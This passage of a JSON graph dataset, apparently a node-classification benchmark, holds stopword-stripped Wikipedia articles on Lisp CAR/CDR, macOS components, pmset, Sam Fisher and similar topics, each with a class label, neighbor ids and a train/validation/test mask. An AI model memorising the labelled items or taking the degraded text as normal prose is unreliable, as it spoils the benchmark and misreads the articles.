francisco manila",
    "neighbors": [
      11648,
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      823,
      439,
      56,
      59,
      3903,
      4673,
      10694,
      2375,
      4039,
      8907,
      1110,
      6489,
      9693,
      2914,
      4194,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      5363,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3370,
    "label": 9,
    "text": "CAR_and_CDR:car cdr computer programming car codice_1 cdr codice_2 primitive operations cons cells non-atomic s-expressions introduced lisp programming language cons cell composed two pointers car operation extracts first pointer cdr operation extracts second thus expression codice_3 evaluates codice_4 codice_5 evaluates codice_6 cons cells used implement singly linked lists rather trees complicated structures car operation returns first element list cdr returns rest list reason operations sometimes given names first rest head tail lisp originally implemented ibm 704 computer late 1950s popular explanation car cdr stand contents address register contents decrement register quite match ibm 704 architecture ibm 704 programmer-accessible address register three address modification registers called index registers ibm 704 successors 36-bit word length 15-bit address space computers two instruction formats one type short 3-bit operation code prefix two 15-bit fields separated 3-bit tag first 15-bit field operand address second held decrement count tag specified one three index registers indexing subtractive process 704 hence value loaded index register called decrement 704 hardware special instructions accessing address decrement fields word result efficient use two fields store within single word two pointers needed list thus car contents address part register term register context refers memory location precursors lisp included functions took machine address argument loaded corresponding word memory extracted appropriate bits 704 assembler macro codice_1 704 assembler macro codice_2 machine word could reassembled cons took four arguments p prefix tag parts dropped early stages lisp design leaving car cdr two-argument cons compositions codice_1 codice_2 given short less pronounceable names form lisp codice_15 equivalent codice_16 value codice_17 similarly codice_18 codice_19 value codice_20 lisps example common lisp scheme systematically define variations two four compositions codice_1 codice_2 many languages particularly functional languages languages influenced functional paradigm use singly linked list basic data structure provide primitives functions similar codice_1 codice_2 named variously codice_25 codice_26 codice_27 codice_28 etc lisp however cons cell used build linked lists also build pair nested pair structures i.e codice_2 cons cell need list case languages provide different primitives typically distinguish pair structures list structures either typefully semantically particularly typed languages lists pairs trees different accessor functions different type signatures haskell example codice_1 codice_2 become codice_32 codice_33 dealing pair type exact analogues codice_1 codice_2 thus rare languages",
    "neighbors": [
      8352,
      9345,
      10083,
      3876,
      4101,
      6502,
      7805,
      3336,
      10403,
      2062,
      372,
      11390,
      5917,
      5598,
      4799
    ],
    "mask": "None"
  },
  {
    "node_id": 3371,
    "label": 2,
    "text": "List_of_macOS_components:list macos components list macos earlier called mac os x components features included current mac operating system automator application developed apple inc. macos implements point-and-click drag drop creation workflows automating repetitive tasks batches quicker alteration thus saving time effort human intervention manually change file separately automator enables repetition tasks across wide variety programs including finder safari calendar contacts others also work third-party applications microsoft office adobe photoshop pixelmator icon features robot holding pipe reference pipelines computer science term connected data workflows automator first released mac os x tiger 10.4 automator provides graphical user interface automating tasks without knowledge programming scripting languages tasks recorded performed user selected list output previous action become input next action automator comes library actions file renaming finding linked images creating new mail message etc act individual steps workflow document workflow document used carry repetitive tasks workflows saved reused unix command line scripts applescripts also invoked actions actions linked together workflow workflow saved application workflow file contextual menu item options set workflow created workflow run workflow file created automator saved /users/ user name /library/services calculator basic calculator application made apple inc. bundled macos three modes basic scientific programmer basic includes number pad buttons adding subtracting multiplying dividing well memory keys scientific mode supports exponents trigonometric functions programmer mode gives user access options related computer programming calculator program long history going back beginning macintosh platform simple four-function calculator program standard desk accessory earliest system versions though higher math capability included third-party developers provided upgrades apple released graphing calculator application first powerpc release 7.1.2 mac os standard component mac os 9 apple currently ships different application called grapher calculator reverse polish notation support also speak buttons pressed result returned calculator appeared first desk accessory first version macintosh system 1984 macintosh 128k original incarnation developed chris espinosa appearance designed part steve jobs espinosa flustered jobs dissatisfaction prototype designs conceived application called steve jobs roll calculator construction set allowed jobs tailor look calculator liking design maintained basic math operations final release classic mac os 2002 dashboard calculator widget included versions macos mac os x tiger onwards basic mode desktop counterpart since release os x yosemite also simple calculator widget available notifications area since release mac os x leopard simple arithmetic functions calculated spotlight feature include standard addition subtraction division multiplication exponentiation use percent sign denote percentage apple chess 3d chess game macos developed apple inc supports chess variants crazyhouse suicide chess originates openstep mac os x 10.2 based open source software apple redistributes source code apple sample code license contacts called address book os x mountain lion computerized address book included apple inc. macos includes various synchronizing capabilities integrates macos applications features address book two viewing modes view card column view card user switch modes control upper-left portion window close box releases prior lion view card column address book window divided three panes first pane title group pane lists directories user-made group users add new groups pulling file menu new group typing command-shift-n selecting user-made group second column title name lists names people cards group names selected group alphabetical order first last name depending user preference third pane card corresponding selected name card include information user classify customizable categories like home work many fields duplicate entries example person card describes several email addresses user edit fields pressing edit button bottom-left third pane address book search ldap network directories users customize ldap tab preferences users search selecting directories first pane selecting directory second pane typing search search box top-left third pane results appear third pane computer must connected local area network directories reside location changed network connection lost address book ’ look contacts directories network computer set access directory services one local area network address book automatically searches directory services addresses one also set address book search lightweight directory access protocol ldap servers addresses ldap internet protocol used looking contact information servers information network directories appears one searching search network directory select directories group column directory directory column type text search field add someone network directory one personal address book drag card directory group column instructions setting one computer access directory services one local area network open directory utility choose help directory utility help dictionary application includes in-built dictionary thesaurus photo booth application user take pictures quicktime player application play video sound files safari web browser time machine application user back files activity monitor system monitor macos operating system also incorporates task manager functionality activity monitor appeared mac os x v10.3 subsumed functionality programs process viewer task manager cpu monitor found previous version os x os x 10.9 activity monitor significantly revamped gained 5th tab energy addition cpu memory disk network airport utility program allows users configure airport wireless network manage services associated devices connected airport routers comes pre-installed macos available download microsoft windows ios airport utility unique offers network configuration native application opposed web application provides graphical overview airport devices attached network provides tools manage one individually allows users configure network preferences assign back mac accounts network configure usb attached printers hard drives current versions 6.3.6 recent versions macos 5.6.1 microsoft windows older versions mac os x 1.3.4 ios january 30 2013 apple released airport utility 6.0 macos featuring redesign user interface focused increasing usability novice users reception mixed media outlets reporting professionals network administrators frustrated removed features reported end users however ’ notice feature omissions users requiring removed features still access previous version airport utility using workaround audio midi setup utility program comes macos operating system adjusting computer audio input output configuration settings managing midi devices first introduced mac os x 10.5 leopard simplified way configure midi devices users need aware prior release midi devices require step mention might omitted midi devices third-party manufactures bluetooth file exchange utility comes macos operating system used exchange files bluetooth-enabled device example could used send image cellphone receive image documents pda assists users installing windows mac using boot camp colorsync utility software ships macos used management color profiles filters used apple pdf workflow applying filters pdf documents interface composed two parts document browser utility window document browser lets zoom image apply filter utility window several options profile first aid profiles devices filters calculator profile first aid allows repair colorsync color profiles conform international color consortium specification profiles allows browse profiles installed system grouped location class space graphically compare two profiles profile map displayed rotatable scalable 3d object plotted cielab cieluv yxy yuv ciexyz devices section allows see list registered colorsync devices displays printers see colorsync profile applied one also override default setting filters section allows build modify pdf filters available rest operating system filter set appear one three domains application pdf workflows printing filters set printing appear drop-down menu save pdf ... button standard mac os x print dialog box filters set pdf workflow appear quartz filters drop-down menu colorsync section print dialog box default filters ship mac os x user-created filters color management image effects pdf retouch domain selection comments color management section allows assigning profile choosing default profile rendering intent converting profile intermediate transform intermediate transform section allows adjustment brightness tint hue saturation bilevel high pass filter profile assignment either grayscale rgb cmyk data file applied either text graphics images shading complex filters created stacking multiple effects changes made pdf file saved new pdf file calculator convert rgb cmyk color value schemes features interactive color-picker identifying color screen duplicating feature another bundled utility digitalcolor meter colorsync apple inc. color management api classic mac os macos apple developed original 1.0 version colorsync mac-only architecture made operating system release 1993 year apple co-founded international color consortium icc develop cross-platform profile format became part colorsync 2.0 system color management module cmm linocolorcmm developed linotype-hell ag part heidelberger druckmaschinen ag cmm used microsoft windows 2000 xp rubric image color management icm apple help adobe ported colorsync 2.0 sdk microsoft windows colorsync 3.0 windows version initially planned discontinued colorsync 4.0 latest version introduced mac os x 10.1 human color perception complex subtle process different devices widely different color gamuts ranges color display deal issues colorsync provides several different methods color matching instance perceptual matching tries preserve closely possible relative relationships colors even colors must systematically distorted order get fit within gamut destination device human eye sensitive color differences rather absolute colors method tends produce best-looking results subjectively speaking many common uses methods work better cases dictated icc system profile connection space colorsync cie xyz color space image input output devices scanners printers displays characterized providing icc profile defines color information interpreted relative reference color space profile might provided device manufacturer better quality results might generated performing actual measurements device colorimeter thus image scanned scanner image file include copy scanner profile characterize meaning color information image sent output device matching process converts color information time rendering source profile attached image destination profile attached output device resulting colors print display closely possible original image console log viewer developed apple inc. included macos allows users search system logged messages alert user certain types messages logged console generally used troubleshooting problem computer macos well applications used send constant stream messages system form log files console allows read system logs help find certain ones monitor filter contents clicking show log list toolbar bring log list log list opens sidebar shows different logs system maintains list helps viewing many different logs maintained various parts system bringing together one place clicking particular log category logs shown system log queries contains logs entire system includes system logs well individual application logs selecting messages gives live look computer activities updated live includes activities system well applications running logs section console formatted uniformly include timestamp name process application actual message log message displayed includes paperclip icon next means shortened version longer report clicking icon show complete report addition viewing messages users also create custom queries criteria like custom queries filter messages also shown messages section order make new query choose new system log query file menu migration assistant application migrating information another computer computer use may windows computer mac system information application shows system information macintosh product voiceover application user listen spoken descriptions computer finder default file manager graphical interface shell macos archive utility bomarchivehelper mac os x 10.5 default archive file handler macos usually invoked automatically opening file one supported formats used create compressed zip archives choosing create archive 'file leopard compress finder file contextual menu located /system/library/coreservices/applications/archive utility.app mac os x 10.10 /system/library/coreservices/archive utility.app 10.5 later /system/library/coreservices/bomarchivehelper.app 10.4 prior archive utility inclusion mac os x v10.3 beginning mac os 7.6 apple bundled freeware stuffit expander operating system invoking archive utility manually shows minimal gui letting user change archive utility preferences choose files compress uncompress bom abbreviation bill materials bill materials files .bom files used macos installer program document files installer bundle installed file permissions file metadata thus bill materials read installer archive utility helps extracting files specified bom crash reporter standard crash reporter macos crash reporter send crash logs apple inc. engineers review crash reporter three modes operations developer tool crashreporterprefs used change modes using terminal command defaults write com.apple.crashreporter dialogtype basic|developer|server basic mode crash reporter notices application crashed twice succession offer rename application preference file try corrupted preference files common cause crashes reporting crash top text field window crash log bottom field user comments users may also copy paste log e-mail client send third-party application developer developer use classic environment usually referred classic hardware software abstraction layer powerpc versions mac os x allows legacy applications compatible mac os 9 run mac os x name classic also sometimes used software vendors refer application programming interface available classic applications differentiate programming mac os x classic version mac os classic environment supported powerpc-based macintosh computers running versions mac os x 10.4 tiger supported 10.5 leopard intel-based macintosh computers running version mac os x classic environment descendant rhapsody blue box virtualization layer served proof concept previously apple a/ux also offered virtualized mac os environment top unix operating system uses mac os 9 system folder new world rom file bridge differences older powerpc macintosh platforms xnu kernel environment classic environment created key element apple strategy replace classic mac os versions 9 mac os x standard operating system os used macintosh computers eliminating need use older os directly classic environment loaded login faster activation needed later command whenever mac os application requires launched reduce use system resources needed requires full version mac os 9 installed system loads instance os sandbox environment replacing low-level system calls equivalent calls mac os x via updated system files classic support system enabler sandbox used launch classic mac os applications—there one instance classic process running given user one user per machine may running classic time user chooses launch classic environment needed launching classic application first launches classic environment configured appear window resembling display computer booting mac os 9 classic environment finished loading application launches classic application foreground menu bar top screen changes look like older mac os system menu dialog boxes user-interface elements retain traditional appearance classic environment provides way run classic applications apple g5 systems well g4 based computers sold january 2003 machines boot mac os 9 earlier without bridging capabilities classic environment software see sheepshaver classic supported versions mac os x run apple systems incorporating intel microprocessors includes new shipping apple computers september 2006 last version mac os x support classic environment powerpcs mac os x v10.4 tiger classic environment compatibility usually good provided application using require direct access hardware engage full-screen drawing however complete clone mac os 9 finder included mac os x v10.2 later support reveal object apple events used mac os 9 applications causing reveal finder functionality applications lost early releases mac os x would often fail draw window frames classic applications correctly classic environment windowing made double buffered mac os x panther older applications games sometimes failed update screen properly original macintosh port doom however classic environment resurrected older applications previously unusable macintosh quadra power macintosh series mac os x replaced mac os 9 virtual memory system standard less fragile implementation classic environment performance also generally acceptable exceptions application run directly powerpc code would possible intel-based macs motorola 68k code handled motorola 68lc040 emulator mac os 9 uses application functions actually faster classic environment mac os 9 equivalent hardware due performance improvements newer operating system device drivers applications largely use heavy disk processing often quickly ported mac os x developers hand applications rely heavy processing share resources mac os 9 co-operative multitasking model interrupted non-classic processes mac os x preemptive multitasking greater processing power systems run mac os x compared systems intended run mac os 8 9 helps mitigate performance degradation classic environment virtualization mac os 9 earlier versions mac os x software update standalone tool program part coreservices os x could automatically inform users new updates new features bug security fixes operating system applications device drivers firmware updates required user enter administrative password required system restart could set check updates daily weekly monthly addition could download store associated .pkg file type used installer installed later date maintained history installed updates starting mac os x 10.5 leopard updates required reboot logged user prior installation automatically restarted computer complete earlier versions os x updates installed critical files replaced next system startup beginning os x 10.8 software update became part app store application beginning macos mojave 10.14 became part system preferences mac os x v10.4 x11.app optional install included install dvd mac os x v10.5 mac os x v10.6 mac os x v10.7 installed x11.app default os x mountain lion 10.8 apple dropped dedicated support x11.app users directed open source xquartz project contributes instead",
    "neighbors": [
      4615,
      4111,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      3167,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      7307,
      6797,
      8852,
      1686,
      7318,
      5784,
      3228,
      2207,
      7842,
      1699,
      10406,
      168,
      3241,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      2282,
      9451,
      10478,
      2288,
      7928,
      8441,
      3324,
      7422,
      11521,
      2819,
      1796,
      6403,
      5895,
      10512,
      11539,
      10516,
      4888,
      11037,
      3879,
      811,
      3371,
      7983,
      10036,
      9529,
      5435,
      4933,
      4423,
      9035,
      1878,
      4457,
      4972,
      5492,
      6022,
      9100,
      9109,
      1439,
      8627,
      950,
      7101,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      5612,
      10221,
      499,
      5619,
      11257,
      7163,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 3372,
    "label": 4,
    "text": "Sam_Fisher_(Splinter_Cell):sam fisher splinter cell samuel fisher fictional character protagonist tom clancy splinter cell series video games developed ubisoft well series tie-in novels endorsed tom clancy full name first seen tom clancy splinter cell first game series using computer v-22 osprey encrypt home call fisher originally voiced veteran actor michael ironside first five installments series 2013 eric johnson assumed voice physical role ironside later returned role 2018 participating crossover downloadable content height 5 10 weight 170lbs samuel fisher lcdr usn-ret former member third echelon top-secret black bag operation sub-branch within national security agency nsa currently commander/head field operative fourth echelon newly created covert special operations/counter-terrorism group reports president united states fisher born 1957 affluent baltimore suburbs towson maryland much known childhood known sam attended military boarding school death parents child accepted united states naval academy graduated 1977 bachelor degree political science commissioned ensign u.s. navy soon personnel file flagged recruitment navy seals joined passing grueling selection process training program mid-1980s fisher attached cia though still active duty navy working official diplomatic cover georgia time part ussr met nsa crypt-analyst named regan burns married 1984/85 small ceremony rhein-main air base frankfurt germany learning regan pregnant 31 may 1985 regan gave birth child named sarah fisher regan divorced three years marriage gaining custody sarah regan reverted maiden name changed sarah well regan died ovarian cancer sometime 2000 fisher gained guardianship sarah moved back u.s. took bureaucratic job cia worked weapons development well studied experimental weaponry information warfare order spend time focus upbringing fisher mission iceland informed sarah allegedly killed drunk driver late 2007 early 2008 however three years later heard rumor death accident went malta investigate captured third echelon malta grim revealed sarah alive sam wanted see daughter help investigate tom reed third echelon hq grim played recording lambert made death new york explaining sarah death faked prevent used leverage mole inside third echelon compromise sam agency learning revelation sam reluctantly continued help grim stopping reed assassinating united states president reuniting daughter retiring government work bored civilian life fisher accept job old associate best-friend victor coste paladin nine security specialized high-tech defense solutions kidnapping recovery work coste injured blacklist attack anderson air base guam offered president patricia caldwell commander fourth echelon consisted sam alongside civilian hacker charlie cole former cia officer isaac briggs lastly co-worker third echelon anna grimsdottir sam direct supervisor handler third echelon irving lambert colonel usa-ret deceased 2008 maintained constant radio contact sam missions providing updates support even one fisher oldest friends especially closest assisting lambert several third echelon employees provided additional reconnaissance logistical technical support sam operating field vernon 'junior wilkes deceased anna grímsdóttir frances coen william redding introduced chaos theory reassigned sometime double agent another sam fisher oldest friends douglas shetland major usmc-ret former usmc recon officer ceo private military corporation plays prominent role third game established fisher served shetland kuwait gulf war shetland unit operating alongside navy seals became close friends stationed aboard uss nimitz shortly fisher rescues hostage situation east timor mission second game shetland asks rest seals sam replies establishing left u.s. navy reserve 1996 saying came alone n't navy decade role shetland pmc displace international chaos theory becomes clear sam hunted kills roof bathhouse tokyo victor 'vic coste another one sam fisher oldest closest friends two served together navy seals iraq persian gulf war 1991 time iraq vic sam part four-man navy seal team ambushed soldiers iraqi republican guard routine foot patrol traversing along road leading baghdad two four men within squad killed ambush sam squad leader time captured vic coste left dead disobeyed direct orders hold position wait evacuation coste single-handedly fought way sam behind enemy lines rescued despite heavily outnumbered outgunned debt sam never forgotten result vic one people sam trusts unconditionally often turns covert assistance field sam 177 cm 5 ft 10 tall weighs 78 kg 170 pounds greying brown-black hair green eyes still athletic build physique man early 60s first person recruited field agent splinter cell program third echelon highly clandestine black ops project highly decorated veteran jsoc devgru cia special activities division fisher master art stealth trained various undercover covert infiltration tactics specializes night-time combat close-quarters combat urban warfare fieldcraft-related skills well addition sam extremely proficient tradecraft skills surveillance tactics computer hacking handling explosives use nearly conventional firearm ambidextrously also highly trained expert various forms martial arts far excels israeli self-defense combat system krav maga utilized center axis relock modern shooting stance used close-quarters combat invented paul castle prefers work alone field established novels sam known command startling number languages including native english spanish german russian korean chinese arabic burmese georgian persian assignment stationed fort meade working third echelon fisher resided townhouse towson farmhouse rural germantown maryland according novelizations series according 2013 graphic novel splinter cell echoes takes place end conviction events happened beginning splinter cell blacklist sam resides two-story house falls church virginia daughter currently lives atlanta georgia stayed book moving new york sam signature sidearm fn five-seven also preferred weapon choice throughout splinter cell franchise washington monument level conviction retrieves five-seven victor coste refers sam favorite pistol fisher conducted operations world bolivia canada cuba former east germany democratic republic congo mainland china iceland israel east timor indonesia guam japan kyrgyzstan russia ukraine turkey azerbaijan libya iraq iran afghanistan north south korea mexico panama peru paraguay myanmar serbia part yugoslavia georgia france also conducted operations inside united states places los angeles international airport denver international airport sabine pass chicago philadelphia fort meade new york city new orleans washington d.c. ellsworth federal penitentiary kansas cia headquarters langley virginia novel version tom clancy splinter cell establishes sam hated time cia working mid-late 1980s mostly official cover i.e diplomatic aide bank mission chaos theory reveals fisher served panama operation cause part cia team raided bank conflict searching manuel noriega drug money around time conflict panama ended january 1990 fisher called back active duty seals deployed iraqi republic spent next several months leading gulf war sleeping ditch road baghdad kuwait prior iraqi invasion kuwait august 1990 already present western military intervention u.s.-led coalition forces began beginning gulf war january 1991 covert operative whose existence completely deniable u.s. government fisher approaches target objectives gruff no-nonsense manner maintains lighthearted relationship colleagues even momentary hostages even going kill fisher little patience government bureaucracy behind-the-scenes political maneuvering realist well aware overarching political ramifications behind assignments specific manner authorized completion fisher maintains cynical jaded sarcastic sense humor covert illegal often morally ambiguous nature work pandora tomorrow lambert informs fisher nobody knows whether norman soth u.s. intelligence agent terrorist fisher replies things n't mutually exclusive time highly loyal staunch believer ideals work ultimately protects quickly angered casual and/or intentional slaughter innocent civilians unarmed military personnel enemies original splinter cell fisher original trial agent nascent third echelon initiative inaugural splinter cell program thus interactions handler colonel lambert relatively straightforward respectful time fisher drop occasional sarcastic wisecrack particularly unusual obtuse instructions instance final level pandora tomorrow sam elevator shuts enemies cut power lambert informs elevator stopped sam retorts sarcastic thanks lambert splinter cell chaos theory fisher blunt appears fairly disappointed lambert orders avoid enemy fatalities part mission parameters frequently holding captured enemies knife-point dialog creative highly intimidating though often morbidly humorous audience splinter cell conviction fisher personality takes leap towards ruthlessness intimidating threats lethal force chaos theory become standard practice fisher often tortures subjects interrogation creative use surrounding objects pianos fire extinguishers windowsills tie-in novels expand fisher character portray detached preferring solitude buying non-perishables cds wants online living first novel explained one-sentence paragraph fisher like way avoids relationships due demands job though eventually engages relationship krav maga instructor katia katia killed sniper shot meant however close relationship daughter sarah used bait trap first novel sarah kidnapped order get fisher novels fisher also mentions ability fall asleep command unlike people sleep tired says asset line work often requires obtain sleep awkward places tom hardy playing younger sam fisher film adaptation splinter cell expected released 2019 2008 age ranked fisher seventh greatest xbox character time stating man action rather words lone wolf sometimes 've got respect hand pc zone staff listed fisher eighth worst character pc gaming history declaring great iconic character one freefall due genuine lack imagination part creators text critique targets splinter cell double agent 2010 game informer readers voted fisher twelfth top character 2000s decade although fisher ultimately make cut game informer staff considered inclusion 30 characters defined decade collection bryan vore saying splinter cell ... easy assume sam fisher simply poor man solid snake quickly gamers thanks quiet deadly efficiency gruff yet sarcastic demeanor willingness disobey orders n't believe 2011 guinness world records gamer edition lists character twenty-fourth popular video game character ugo networks featured fisher list coolest helmets headgear video games number 5 remarking unrecognizable without three-eyed night vision goggles perched forehead 2012 gamesradar ranked 37th memorable influential badass protagonist games adding voiced michael ironside wears awesome night vision goggles good enough right fine ... like macgyver-meets-james bond-meets-batman since list updated annually 2013 complex ranked sam fisher number 18 list greatest soldiers video games calling little bit like american james bond—only without things james bond besides kill dudes",
    "neighbors": [
      7424,
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 3373,
    "label": 2,
    "text": "Pmset:pmset computing pmset command line utility manipulate power management settings darwin macos operating systems assign sleep settings schedule sleep wake times display power information pmset utility first appeared darwin 6.0.1 mac os x 10.2 jaguar updated periodically since introduction still available darwin 17.0 macos 10.13 high sierra utility sets lists power management settings functionality provided utility available gui interface energy saver preference pane however pmset allows greater flexibility access several options available gui utility set different power management settings depending usage scenario different settings applied machine running charger battery ups three appropriate flags follows additional arguments supplied assigning power management settings power management arguments discussed greater detail invoking command specified arguments modify power management options arguments already set unmodified pmset unless arguments specifically included utility schedule wake sleep power power events events recurring based arbitrary weekday time combinations scheduled future dates times syntax scheduling event follows previously stored events overwritten upon running command schedule multiple events must entered one command string example set shutdown event every day week 23:59 wake power event every day week 7:00 enter following get flag displays information current power management configuration log recent activity additional arguments supplied flag display current settings additional get arguments discussed greater detail get flag follows view currently scheduled events type utility also able configure hibernation safe sleep options change energy saver profiles pmset utility recognizes following arguments arguments passed serial form order bad syntax unrecognized argument cause entire command fail resulting error message brief help screen power management settings changed privileged user settings may adjusted independently circumstances machine attached charger running battery case laptop running ups available settings also adjusted four scenarios simultaneously default option usage flag specified power management options specified different profiles appending -c charger -b battery -u ups -a flags following example set machine sleep 10 minutes sleep display five minutes powered battery following command assign slightly different power management settings circumstances machine powered charger machine set sleep 30 minutes display set never sleep set charger issuing commands interfere arguments entered serial form set modify several power management parameters one command following command set machine never sleep sleep 0 enable sudden motion sensor sms 1 set display sleep 20 minutes displaysleep 20 disable processor speed reduction reduce 0 enable intermediate display dimness halfdim 1 enable machine wake lid opened lidwake 1 prevent system sleeping tty session ssh active ttyskeepawake 1 disable waking machine ac adapter inserted acwake 0 disable automatic restart power removed restored autorestart 0 enable dynamic change processor speed based system load dps 1 enable wake modem ring ring 1 enable wake receipt magic ethernet packet womp 1 disable hard disk sleep disksleep 0 example include usage flag settings specified apply usage scenarios subsequent commands specify usage flag affect settings usage scenario instance pmset -b sleep 10 cause machine sleep 10 minutes battery attached settings apply battery attached settings example apply charger ups attached least darwin 9.4 os x 10.5.4 leopard changes made pmset saved persistent preferences file /library/preferences/systemconfiguration/com.apple.powermanagement.plist file modified manually using defaults command changes taken immediately power management system manual edits com.apple.powermanagement.plist also stand risk overwritten command pmset touch reread existing settings disk apply system autopoweroff enabled machine got hibernate mode even hibernatemode 0 value autopoweroffdelay may seconds despite man page mavericks nov 9 2012 documenting minutes pmset command able schedule system sleep shutdown wakeup power events schedule argument setting one-time power events repeat setting daily weekly events scheduling events done privileged user schedule argument recognizes following additional arguments utility unforgiving improper syntax errors syntax cause command fail display brief help message syntax scheduled event follows one type event sleep wake et cetera specified date chosen must future utility expects able store information pmu may work reliably non-apple hardware date time string must enclosed quotation marks syntax repeating event follows scheduled wake sleep power events stored persistent preferences file /library/preferences/systemconfiguration/com.apple.autowake.plist file manually edited using defaults command changes made stand serious risk overwritten also edits immediately taken system list flag -g displays information current power configuration flag alone additional arguments display current power management settings additional arguments display specific information get functions pmset require privileged access utility recognizes following arguments one get argument passed pmset must preceded get flag instance display scheduled events type pmset -g sched utility return error one get argument provided first ignored sleep displaysleep show imposed value 0 disabled together list process ids impose value processes backup programs need machine stay awake example backup finished following examples demonstrate output pmset command apple powerbook g4 running mac os x 10.5.4 leopard following example put relevant computer sleep immediately following example apply laptops powered battery set machine sleep 5 minutes inactivity put display sleep 2 minutes spin hard disk 3 minutes privileged users issue command command issued successfully without syntax errors pmset exit silently exit code 0 verify system took new configuration issue command pmset -g. following example apply machines powered ups set machine perform emergency shutdown 5 percent battery remains ups 5 minutes estimated draw time remains whichever comes first privileged users issue command command issued successfully without syntax errors pmset exit silently exit code 0 verify system took new configuration issue command pmset -g. following example apply usage scenarios set machine wake receipt magic ethernet packet wake modem detects ring prevent system sleeping tty session active privileged users issue command command issued successfully without syntax errors pmset exit silently exit code 0 verify system took new configuration issue command pmset -g. following example sets one-time scheduled power event machine set shut 01/10/2009 10:00 pm 10 january 2009 – note us centric mm/dd/yyy time syntax privileged users issue command command issued successfully without syntax errors pmset exit silently exit code 0 verify system took new configuration issue command pmset -g sched following example sets repeating power event machine wake power every weekday 8:00 privileged users issue command command issued successfully without syntax errors pmset exit silently exit code 0 verify system took new configuration issue command pmset -g sched example output pmset -g. time machine powered charger simultaneously charging battery command prints current configuration example output pmset -g sched example machine already configured repeating event start wake every weekday 8:00 command prints repeating event note next occurrence appears scheduled power event example output pmset -g. time machine backed output shows pid backup program",
    "neighbors": [
      9035,
      3181,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 3374,
    "label": 9,
    "text": "Babbage_(programming_language):babbage programming language babbage high level assembly language gec 4000 series minicomputers named charles babbage english computing pioneer",
    "neighbors": [
      9345,
      1349,
      8262,
      9835,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 3375,
    "label": 8,
    "text": "SemanticGov:semanticgov semanticgov european union-funded research development project lasted 2006 2009 aimed building infrastructure software models services etc necessary enabling offering semantic web services public administration pa semanticgov aimed address longstanding challenges faced public administrations achieving interoperability amongst pa agencies within country well amongst countries easing discovery pa services customers facilitating execution complex services often involving multiple pa agencies interworkflows semanticgov project aimed capitalizing service oriented architectures paradigm implemented state-of-the-art semantic web services technology supported rigorous reusable public administration domain analysis modelling line major european programmes initiatives field e.g european interoperability framework previous work conducted eu idabc programme i2010 group member states representatives competitiveness innovation cip programme semanticgov project objectives support pa client identify needed services providing infrastructure mapping client needs pa services b discover service interest federal/national pa service directory c. execute monitor service workflow providing infrastructure on-the-fly semi-automated composition execution monitoring complex pa services ii support european citizens businesses access pan-european egovernment services pegs providing communal semantic gateway resolve semantic incompatibilities amongst different administration systems semanticgov project meant simply provide new electronic government solutions a. enhance administrative capacity national public administration systems providing new paradigm service provision b. pave way administrative dimension european unification aka “ common european administrative space ” facilitating communication amongst eu national administrative systems list consortium partners follows",
    "neighbors": [
      7897
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3376,
    "label": 4,
    "text": "DivvyCloud:divvycloud divvy cloud corporation privately held venture-backed american cybersecurity company headquarters arlington virginia core product protects cloud container environments misconfigurations policy violations threats iam challenges automated real-time remediation divvycloud customers achieve continuous security compliance fully realize benefits cloud container technology divvycloud supports aws microsoft azure google cloud platform alibiba cloud kubernetes divvycloud category technology classified gartner cloud security posture management divvycloud founded may 2013 former electronic arts employees brian johnson chris deramus tenure electronic arts responsible large-scale infrastructure mmorpg titles writing proprietary tools manage complex environment left electronic arts created divvycloud may 2019 divvycloud secured 19 million funding round led providence strategic growth arm providence equity partners contributions existing investors missionog rtp ventures investment brought total capital raised date 29 million following 6 million series round september 2017 company numerous awards including cyber defense magazine editor ’ choice winner 2019 infosec awards cloud security category 2019 cyber security excellence awards",
    "neighbors": [
      7248,
      5295,
      1935
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3377,
    "label": 4,
    "text": "Linked_timestamping:linked timestamping linked timestamping type trusted timestamping issued time-stamps related linked timestamping creates time-stamp tokens dependent entangled authenticated data structure later modification issued time-stamps would invalidate structure temporal order issued time-stamps also protected data structure making backdating issued time-stamps impossible even issuing server top authenticated data structure generally published hard-to-modify widely witnessed media like printed newspaper public blockchain long-term private keys use avoiding pki-related risks suitable candidates authenticated data structure include simplest linear hash chain-based time-stamping scheme illustrated following diagram linking-based time-stamping authority tsa usually performs following distinct functions linked timestamping inherently secure usual public-key signature based time-stamping consequential time-stamps seal previously issued ones hash chain authenticated dictionary use could built one way modifying issued time-stamps nearly hard finding preimage used cryptographic hash function continuity operation observable users periodic publications widely witnessed media provide extra transparency tampering absolute time values could detected users whose time-stamps relatively comparable system design absence secret keys increases system trustworthiness keys leak hash algorithms considered future-proof modular arithmetic based algorithms e.g rsa linked timestamping scales well hashing much faster public key cryptography need specific cryptographic hardware limitations common technology guaranteeing long-term attestation value issued time-stamps digitally signed data periodic over-time-stamping time-stamp token missing key-related risks plausible safety margin reasonably chosen hash function over-time-stamping period hash-linked token could order magnitude longer public-key signed token haber stornetta proposed 1990 link issued time-stamps together linear hash-chain using collision-resistant hash function main rationale diminish tsa trust requirements tree-like schemes operating rounds proposed benaloh de mare 1991 bayer haber stornetta 1992 benaloh de mare constructed one-way accumulator 1994 proposed use time-stamping used aggregation one-way accumulator requires one constant-time computation round membership verification surety started first commercial linked timestamping service january 1995 linking scheme described security analyzed following article haber sornetta buldas et al continued optimization formal analysis binary tree threaded tree based schemes skip-list based time-stamping system implemented 2005 related algorithms quite efficient security proof hash-function based time-stamping schemes presented buldas saarepera 2004 explicit upper bound formula_1 number time stamps issued aggregation period suggested probably impossible prove security without explicit bound so-called black-box reductions fail task considering known practically relevant efficient security proofs black-box negative result quite strong next 